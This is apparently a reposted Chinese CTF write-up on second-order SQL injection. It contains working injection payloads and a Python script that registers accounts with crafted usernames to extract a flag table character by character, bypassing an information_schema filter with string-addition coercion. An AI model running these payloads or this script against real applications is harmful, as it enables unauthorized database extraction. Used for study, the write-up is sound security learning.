本文共 1448 字,大约阅读时间需要 4 分钟。
二次注入
register.php
页面中的name中root' and '1
这里注册成功了1' union select 1,database()#
的时候nnnnoooo!!!!
也就是 这里还存在一个过滤????information_schema
被过滤掉我属实没想到 完全不知道怎么搞了import requestsimport reregister_url = 'http://111.200.241.244:45701/register.php'login_url = 'http://111.200.241.244:45701/login.php'for i in range(1, 100): register_data = { 'email': '111@123.com%d' % i, 'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i, 'password': 'admin' } res = requests.post(url=register_url, data=register_data) login_data = { 'email': '111@123.com%d' % i, 'password': 'admin' } res_ = requests.post(url=login_url, data=login_data) code = re.search(r'\s*(\d*)\s*', res_.text) print(chr(int(code.group(1))), end='')
information_schema
被过滤了 想利用union注入肯定是不行的了+
号的作用就是将字符转化为数字相加'1' + '1a' # 2'0' + database() # 0 '0' + substr(database(),1,1) # 100 则database()的第一个字符的ascii值就为100
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
转载地址:http://vywmf.baihongyu.com/